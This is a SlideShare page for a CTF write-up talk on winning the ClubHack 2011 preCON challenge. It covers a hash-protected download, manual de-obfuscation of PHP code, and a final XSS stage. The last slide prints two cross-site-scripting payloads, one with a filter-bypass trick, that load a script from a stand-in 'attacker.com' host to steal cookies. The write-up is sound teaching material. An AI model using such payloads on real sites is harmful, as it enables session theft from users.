SlideShare ist ein Scribd-Unternehmen logo

How i-won-club hack-precon-ctf-v2

n|u - The Open Security Community
n|u - The Open Security Community

null December'11 Pune Meet

BildungTechnologie
1 von 18
How I won ClubHack 2011 CTF AMol NAik http://amolnaik4.blogspot.com
Agenda  Introduction to CTF  ClubHack 2011 preCON CTF  Tools  Execution Stages  Thanks/Questions
Introduction to CTF  CTF stands for Capture the Flag  Types:  Pre-conference  Educational  Web based  Exploitation  Web + Exploitation  Teams / Individuals  Offensive / Defensive
ClubHack 2011 preCON CTF  Free conference entry  Qualified to play Treasure Hunt @ClubHack  Physical CTF  Web Based
Tools  Mozilla Firefox  Add-on: Tamper Data  Web Server with PHP  Brain  Time  Patience  ……..  ……..
Execution  Register for the event  Access CTF site  Gather Information & Analyze  Look for hidden treasures  Get the Flag and Submit
Stage - 1  Information Gathering  Download.html  Can be used to download files from server  Two params: filename & some HASH  How imp the hash is in file download ?  What type of Hash it is?  How to generate it?  UserLogin.html  Auth Bypass  Guessable Logins  What else ???
Stage - 1  Analysis  Download.html  Need hash to download file  Hash is SHA1  How to generate it?  UserLogin.html  No SQLi  No Auth Bypass  No Guessable Login  Brute Force ???
Stage - 2  Deep Inspection  Found „execute.php‟ in source of download.html   Looks like command utility  OS commanding ???  Analysis  No OS command execution  “Wonly one command”  Commands which takes „file‟ as parameter ???  Single Command  sha1sum
Stage - 3  Something to work on  Hash generation – execute.php  File Download – download.php  Login – UserLogin.php  Try to download files  Download.php  Execute.php  UserLogin.php  Analysis  Only „UserLogin.php‟ is possible to download
Stage - 4  Obfuscated PHP Code  UserLogin.php is obfuscated  “Free Online PHP Obfuscator v1.2: http://www.fopo.com.a r”  No Online de-obfuscation tool available   I was not able to find out one  Analysis  Go Manual Mode !!  Create scripts
Stage - 5  De-Obfuscation  Replace eval() with echo() -  Base64_decode()  Decode $variable names  Replace $variables -  ROT13 -> Base64_decode() -> gzinflate()  Just echo  -
Stage - 5  Analysis  Credentials -> „myhashesarenothere.txt‟  Successful Login -> Final.php  Next  Access „myhashesarenothere.txt‟  Login in UserLogin.php
Stage – 6: Final  Information Gathering  POST form  Looks like mail client  Hard-coded email addresses & Subject  Message is the only available space for User Input  Analysis  Tamper „TO‟ email address & „Subject‟  Test „Message‟ for SQLi, Code Injection, ….  What else ???
Stage – 6: Final  Damn…It‟s a ROCK !!!!  No server-side bug  Code Injection  SQLi  Only XSS  No <script> & <img>  May be flag.txt  May be messages.txt || mail.txt || sec*.txt  ?????  ?????
Stage – 6: Final  A Ray of Hope  Tweet from @ClubHack  Only “XSS”  Never seen XSS in CTF  What to exploit?  Myself??  Event Handlers  document.cookie  Did they mean “Some Cookie” ?
Final  After 2-days  Got Flag & Submit link   Free entry to ClubHack -> Secured !!  Payloads Used:  <ScRiPt src=“http://attacker.com/evil.js”></script>  me  <scr<script>ipt src=“http://attacker.com/evil.js”></script>  Vishal Oza
Thanks/Questions  webDEViL  CTF Creation and Access for “Live Demo”  ClubHack  Organizing CTF challenge  For Gifts !!! http://twitter.com/amolnaik4

Empfohlen

Club hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughClub hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughn|u - The Open Security Community
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Abusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionAbusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionNarendra Bhati
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksNarendra Bhati
 
CNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringCNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringSam Bowne
 
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsCNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsSam Bowne
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 

Empfohlen

Club hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughClub hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughn|u - The Open Security Community
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Abusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionAbusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionNarendra Bhati
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksNarendra Bhati
 
CNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringCNIT 124: Ch 5: Information Gathering
CNIT 124: Ch 5: Information GatheringSam Bowne
 
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsCNIT 124: Ch 6: Finding Vulnerabilities and Exploiting Domains
CNIT 124: Ch 6: Finding Vulnerabilities and Exploiting DomainsSam Bowne
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP ShellsVedran Krivokuca
 
Installation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPInstallation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPRupesh Kumar
 
PHP: The Beginning and the Zend
PHP: The Beginning and the ZendPHP: The Beginning and the Zend
PHP: The Beginning and the Zenddoublecompile
 
PHP presentation - Com 585
PHP presentation - Com 585PHP presentation - Com 585
PHP presentation - Com 585jstout007
 
File inclusion
File inclusionFile inclusion
File inclusionAaftabKhan14
 
Php
PhpPhp
Phpanandha ganesh
 
Web backends development using Python
Web backends development using PythonWeb backends development using Python
Web backends development using PythonAyun Park
 
PHP Presentation
PHP PresentationPHP Presentation
PHP PresentationJIGAR MAKHIJA
 
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfBrute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfLior Rotkovitch
 
PHP Tutorials
PHP TutorialsPHP Tutorials
PHP TutorialsYuriy Krapivko
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Building websites with TYPO3 Neos
Building websites with TYPO3 NeosBuilding websites with TYPO3 Neos
Building websites with TYPO3 NeosFedir RYKHTIK
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakesguest2821a2
 
Php intro
Php introPhp intro
Php introJennie Gajjar
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 
MySQL Presentation
MySQL PresentationMySQL Presentation
MySQL PresentationManish Bothra
 
Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2Indonesia Infrastructure Initiative
 
January Phoenix Area Market Report
January Phoenix Area Market ReportJanuary Phoenix Area Market Report
January Phoenix Area Market ReportLen Nevin
 
BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09Marcelo Nonato
 

Weitere ähnliche Inhalte

Was ist angesagt?

TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 
Installation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPInstallation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPRupesh Kumar
 
PHP: The Beginning and the Zend
PHP: The Beginning and the ZendPHP: The Beginning and the Zend
PHP: The Beginning and the Zenddoublecompile
 
PHP presentation - Com 585
PHP presentation - Com 585PHP presentation - Com 585
PHP presentation - Com 585jstout007
 
Web backends development using Python
Web backends development using PythonWeb backends development using Python
Web backends development using PythonAyun Park
 
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfBrute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfLior Rotkovitch
 
Building websites with TYPO3 Neos
Building websites with TYPO3 NeosBuilding websites with TYPO3 Neos
Building websites with TYPO3 NeosFedir RYKHTIK
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakesguest2821a2
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 

Was ist angesagt? (19)

TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
 
Php File Upload
Php File UploadPhp File Upload
Php File Upload
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP Shells
 
Installation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHPInstallation of OpenBiblio on Windows XP using EasyPHP
Installation of OpenBiblio on Windows XP using EasyPHP
 
PHP: The Beginning and the Zend
PHP: The Beginning and the ZendPHP: The Beginning and the Zend
PHP: The Beginning and the Zend
 
PHP presentation - Com 585
PHP presentation - Com 585PHP presentation - Com 585
PHP presentation - Com 585
 
File inclusion
File inclusionFile inclusion
File inclusion
 
Php
PhpPhp
Php
 
Web backends development using Python
Web backends development using PythonWeb backends development using Python
Web backends development using Python
 
PHP Presentation
PHP PresentationPHP Presentation
PHP Presentation
 
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfBrute Force - Lior Rotkovitch - f5 SIRT v5.pdf
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdf
 
PHP Tutorials
PHP TutorialsPHP Tutorials
PHP Tutorials
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCE
 
Building websites with TYPO3 Neos
Building websites with TYPO3 NeosBuilding websites with TYPO3 Neos
Building websites with TYPO3 Neos
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
 
Web Browsers And Other Mistakes
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakes
 
Php intro
Php introPhp intro
Php intro
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101
 
MySQL Presentation
MySQL PresentationMySQL Presentation
MySQL Presentation
 

Andere mochten auch

January Phoenix Area Market Report
January Phoenix Area Market ReportJanuary Phoenix Area Market Report
January Phoenix Area Market ReportLen Nevin
 
BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09Marcelo Nonato
 

Andere mochten auch (6)

Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2Cara Meraih Sukses Secara Finansial 2
Cara Meraih Sukses Secara Finansial 2
 
January Phoenix Area Market Report
January Phoenix Area Market ReportJanuary Phoenix Area Market Report
January Phoenix Area Market Report
 
BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09BJ Reunião com Formadores 07dez09
BJ Reunião com Formadores 07dez09
 
Ecoporanga
EcoporangaEcoporanga
Ecoporanga
 
CGI Proxy
CGI ProxyCGI Proxy
CGI Proxy
 
Louvre u geziyoruz
Louvre u geziyoruzLouvre u geziyoruz
Louvre u geziyoruz
 

Ähnlich wie How i-won-club hack-precon-ctf-v2

Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentationSqa Enthusiast
 
Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009ClubHack
 
Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Combell NV
 
Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Abraham Aranguren
 
Columbus WordCamp 2015
Columbus WordCamp 2015Columbus WordCamp 2015
Columbus WordCamp 2015Jason Packer
 
Abraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permissionAbraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permissionYury Chemerkin
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$Joe Ferguson
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariJoseph Scott
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
The why and how of moving to php 8
The why and how of moving to php 8The why and how of moving to php 8
The why and how of moving to php 8Wim Godden
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentationwebhostingguy
 
Symfony2 - A Short Introduction
Symfony2 - A Short IntroductionSymfony2 - A Short Introduction
Symfony2 - A Short IntroductionAndy Grunwald
 
The why and how of moving to php 5.4
The why and how of moving to php 5.4The why and how of moving to php 5.4
The why and how of moving to php 5.4Wim Godden
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 

Ähnlich wie How i-won-club hack-precon-ctf-v2 (20)

Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
 
Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009Anant kochhar _revealing_the_secrets - ClubHack2009
Anant kochhar _revealing_the_secrets - ClubHack2009
 
Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10
 
Talking to Web Services
Talking to Web ServicesTalking to Web Services
Talking to Web Services
 
Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012
 
Columbus WordCamp 2015
Columbus WordCamp 2015Columbus WordCamp 2015
Columbus WordCamp 2015
 
Abraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permissionAbraham aranguren. legal and efficient web app testing without permission
Abraham aranguren. legal and efficient web app testing without permission
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$All the Laravel things: up and running to making $$
All the Laravel things: up and running to making $$
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Kohana 3.1
Kohana 3.1Kohana 3.1
Kohana 3.1
 
The why and how of moving to php 8
The why and how of moving to php 8The why and how of moving to php 8
The why and how of moving to php 8
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentation
 
Symfony2 - A Short Introduction
Symfony2 - A Short IntroductionSymfony2 - A Short Introduction
Symfony2 - A Short Introduction
 
The why and how of moving to php 5.4
The why and how of moving to php 5.4The why and how of moving to php 5.4
The why and how of moving to php 5.4
 
XML External Entity (XXE)
XML External Entity (XXE)XML External Entity (XXE)
XML External Entity (XXE)
 
2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 

Mehr von n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Mehr von n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Kürzlich hochgeladen

Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdfInclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdfTechSoup
 
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxBarangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxCarlos105
 
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYKayeClaireEstoconing
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Celine George
 
ACC 2024 Chronicles. Cardiology. Exam.pdf
ACC 2024 Chronicles. Cardiology. Exam.pdfACC 2024 Chronicles. Cardiology. Exam.pdf
ACC 2024 Chronicles. Cardiology. Exam.pdfSpandanaRallapalli
 
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...Postal Advocate Inc.
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxiammrhaywood
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSJoshuaGantuangco2
 
Proudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxProudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxthorishapillay1
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designMIPLM
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...Nguyen Thanh Tu Collection
 
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxHumphrey A Beña
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Celine George
 
4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptxmary850239
 
Judging the Relevance and worth of ideas part 2.pptx
Judging the Relevance and worth of ideas part 2.pptxJudging the Relevance and worth of ideas part 2.pptx
Judging the Relevance and worth of ideas part 2.pptxSherlyMaeNeri
 
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)lakshayb543
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Celine George
 

Kürzlich hochgeladen (20)

Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdfInclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
 
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxBarangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
 
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17
 
ACC 2024 Chronicles. Cardiology. Exam.pdf
ACC 2024 Chronicles. Cardiology. Exam.pdfACC 2024 Chronicles. Cardiology. Exam.pdf
ACC 2024 Chronicles. Cardiology. Exam.pdf
 
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
 
Proudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxProudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptx
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-design
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
 
